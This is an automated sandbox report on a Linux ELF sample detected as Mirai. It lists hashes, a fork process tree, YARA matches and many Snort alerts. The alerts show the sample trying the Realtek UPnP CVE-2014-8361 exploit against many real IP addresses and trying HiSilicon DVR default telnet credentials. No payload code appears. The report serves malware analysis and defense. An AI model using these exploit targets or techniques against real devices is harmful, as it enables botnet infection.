Play interactive tour

Edit tour

Linux Analysis Report BitmCvTrdO

Overview

General Information

Sample Name:	BitmCvTrdO
Analysis ID:	512691
MD5:	83f51eab5d7a35965c15c15a0966ccc8
SHA1:	3fa59c483662eff85b5b454692eb3dbaa76944ed
SHA256:	9ae7441ecbce9ecf93e8825a4a98b04ec55388a614cbae4baaf8f5e037ee8a76
Tags:	32elfmiraisparc
Infos:

Detection

Mirai

Score:	80
Range:	0 - 100
Whitelisted:	false

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected Mirai

Multi AV Scanner detection for submitted file

Uses known network protocols on non-standard ports

Connects to many ports of the same IP (likely port scanning)

Sample has stripped symbol table

HTTP GET or POST without a user agent

Uses the "uname" system call to query kernel version information (possible evasion)

Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Detected TCP or UDP traffic on non-standard ports

Classification

Analysis Advice

All HTTP servers contacted by the sample do not answer. Likely the sample is an old dropper which does no longer work

Static ELF header machine description suggests that the sample might not execute correctly on this machine

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	512691
Start date:	01.11.2021
Start time:	10:31:21
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 26s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	BitmCvTrdO
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Detection:	MAL
Classification:	mal80.troj.lin@0/0@0/0
Warnings:	Show All Report size exceeded maximum capacity and may have missing network information. TCP Packets have been reduced to 100

Process Tree

system is lnxubuntu20

BitmCvTrdO (PID: 5233, Parent: 5112, MD5: 7dc1c0e23cd5e102bb12e5c29403410e) Arguments: /tmp/BitmCvTrdO

BitmCvTrdO New Fork (PID: 5235, Parent: 5233)

BitmCvTrdO New Fork (PID: 5240, Parent: 5235)

BitmCvTrdO New Fork (PID: 5241, Parent: 5235)

BitmCvTrdO New Fork (PID: 5246, Parent: 5241)

BitmCvTrdO New Fork (PID: 5268, Parent: 5246)

BitmCvTrdO New Fork (PID: 5271, Parent: 5246)

BitmCvTrdO New Fork (PID: 5272, Parent: 5246)

BitmCvTrdO New Fork (PID: 5273, Parent: 5246)

BitmCvTrdO New Fork (PID: 5256, Parent: 5241)

BitmCvTrdO New Fork (PID: 5269, Parent: 5241)

BitmCvTrdO New Fork (PID: 5278, Parent: 5241)

BitmCvTrdO New Fork (PID: 5280, Parent: 5241)

BitmCvTrdO New Fork (PID: 5236, Parent: 5233)

BitmCvTrdO New Fork (PID: 5237, Parent: 5233)

BitmCvTrdO New Fork (PID: 5244, Parent: 5237)

BitmCvTrdO New Fork (PID: 5260, Parent: 5244)

BitmCvTrdO New Fork (PID: 5261, Parent: 5244)

BitmCvTrdO New Fork (PID: 5262, Parent: 5244)

BitmCvTrdO New Fork (PID: 5264, Parent: 5244)

BitmCvTrdO New Fork (PID: 5247, Parent: 5237)

BitmCvTrdO New Fork (PID: 5248, Parent: 5237)

BitmCvTrdO New Fork (PID: 5251, Parent: 5237)

BitmCvTrdO New Fork (PID: 5257, Parent: 5237)

cleanup

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
BitmCvTrdO	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Mirai_12	Yara detected Mirai	Joe Security

Memory Dumps

Source	Rule	Description	Author
5236.1.00000000a7ecdb85.000000008504b126.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
5268.1.00000000a7ecdb85.000000008504b126.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
5233.1.00000000a7ecdb85.000000008504b126.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
5256.1.00000000a7ecdb85.000000008504b126.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
5235.1.00000000a7ecdb85.000000008504b126.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
5247.1.00000000a7ecdb85.000000008504b126.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
5240.1.00000000a7ecdb85.000000008504b126.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
5260.1.00000000a7ecdb85.000000008504b126.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
Click to see the 3 entries

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: BitmCvTrdO

Virustotal: Detection: 54%

Perma Link

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58106 -> 91.78.109.74:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:58106 -> 91.78.109.74:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58110 -> 91.78.109.74:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33720 -> 185.113.135.220:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:33720 -> 185.113.135.220:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33724 -> 185.113.135.220:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45730 -> 45.120.206.197:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:45730 -> 45.120.206.197:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33112 -> 185.131.76.128:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:33112 -> 185.131.76.128:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48862 -> 91.77.125.188:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:48862 -> 91.77.125.188:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33116 -> 185.131.76.128:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48866 -> 91.77.125.188:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45178 -> 45.123.199.21:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:45178 -> 45.123.199.21:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54094 -> 45.134.145.100:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:54094 -> 45.134.145.100:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44346 -> 91.220.244.246:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:44346 -> 91.220.244.246:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44348 -> 91.220.244.246:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47454 -> 45.42.80.106:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:47454 -> 45.42.80.106:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 180.27.97.100:23 -> 192.168.2.23:37120
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:57800 -> 185.241.254.68:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:57800 -> 185.241.254.68:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35248 -> 91.77.146.140:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:35248 -> 91.77.146.140:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:57810 -> 185.241.254.68:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35258 -> 91.77.146.140:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60026 -> 45.120.111.111:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60026 -> 45.120.111.111:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43806 -> 45.248.68.108:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:43806 -> 45.248.68.108:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60034 -> 45.120.111.111:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:57002 -> 185.160.196.252:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:57002 -> 185.160.196.252:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:57008 -> 185.160.196.252:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34958 -> 45.33.242.236:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:34958 -> 45.33.242.236:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54540 -> 45.116.145.63:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:54540 -> 45.116.145.63:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:50292 -> 91.200.121.10:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43352 -> 45.120.185.99:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:43352 -> 45.120.185.99:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50468 -> 185.37.99.196:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:50468 -> 185.37.99.196:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42204 -> 185.147.57.21:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42204 -> 185.147.57.21:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42210 -> 185.147.57.21:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34656 -> 45.43.225.83:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:34656 -> 45.43.225.83:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50474 -> 185.37.99.196:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 180.27.97.100:23 -> 192.168.2.23:37216
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50062 -> 91.77.129.223:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:50062 -> 91.77.129.223:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50068 -> 91.77.129.223:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35036 -> 45.195.14.142:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:35036 -> 45.195.14.142:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 180.27.97.100:23 -> 192.168.2.23:37264
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44102 -> 185.71.64.14:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:44102 -> 185.71.64.14:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44106 -> 185.71.64.14:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49408 -> 45.126.231.4:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:49408 -> 45.126.231.4:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55714 -> 45.195.156.82:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:55714 -> 45.195.156.82:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34654 -> 45.154.3.196:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:34654 -> 45.154.3.196:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60102 -> 45.122.139.51:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60102 -> 45.122.139.51:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39866 -> 45.125.111.98:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:39866 -> 45.125.111.98:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 180.27.97.100:23 -> 192.168.2.23:37288
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50506 -> 45.120.78.221:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:50506 -> 45.120.78.221:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 180.27.97.100:23 -> 192.168.2.23:37304
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37454 -> 185.71.65.203:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37454 -> 185.71.65.203:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47606 -> 91.76.194.235:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:47606 -> 91.76.194.235:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37458 -> 185.71.65.203:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47610 -> 91.76.194.235:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 180.27.97.100:23 -> 192.168.2.23:37320
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54216 -> 45.33.253.197:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:54216 -> 45.33.253.197:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46404 -> 45.115.243.247:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:46404 -> 45.115.243.247:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 180.27.97.100:23 -> 192.168.2.23:37334
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40864 -> 45.134.145.82:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:40864 -> 45.134.145.82:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44940 -> 91.77.246.216:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:44940 -> 91.77.246.216:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44944 -> 91.77.246.216:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50336 -> 91.77.125.71:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:50336 -> 91.77.125.71:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50338 -> 91.77.125.71:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53340 -> 45.41.86.221:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53340 -> 45.41.86.221:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49244 -> 45.120.110.110:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:49244 -> 45.120.110.110:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:57154 -> 45.43.231.211:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:57154 -> 45.43.231.211:52869
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:42932 -> 113.253.54.241:23
Source: Traffic	Snort IDS: 716 INFO TELNET access 180.27.97.100:23 -> 192.168.2.23:37372
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49266 -> 45.120.110.110:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55412 -> 45.42.93.215:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:55412 -> 45.42.93.215:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59630 -> 91.243.172.158:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:59630 -> 91.243.172.158:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59640 -> 91.243.172.158:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54410 -> 45.41.89.52:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:54410 -> 45.41.89.52:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49562 -> 45.113.1.113:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:49562 -> 45.113.1.113:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41150 -> 185.225.193.169:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41150 -> 185.225.193.169:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41002 -> 45.43.234.203:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41002 -> 45.43.234.203:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 180.27.97.100:23 -> 192.168.2.23:37424
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41156 -> 185.225.193.169:52869
Source: Traffic	Snort IDS: 404 ICMP Destination Unreachable Protocol Unreachable 91.156.203.206: -> 192.168.2.23:
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54750 -> 185.185.134.181:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:54750 -> 185.185.134.181:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 180.27.97.100:23 -> 192.168.2.23:37464
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43690 -> 185.70.189.120:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:43690 -> 185.70.189.120:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43694 -> 185.70.189.120:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49972 -> 45.42.92.234:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:49972 -> 45.42.92.234:52869
Source: Traffic	Snort IDS: 404 ICMP Destination Unreachable Protocol Unreachable 185.44.59.178: -> 192.168.2.23:
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38414 -> 45.138.69.3:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:38414 -> 45.138.69.3:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36794 -> 45.41.89.170:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:36794 -> 45.41.89.170:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:51092 -> 45.33.245.119:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:51092 -> 45.33.245.119:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33388 -> 45.195.13.110:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:33388 -> 45.195.13.110:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47690 -> 45.41.92.119:52869
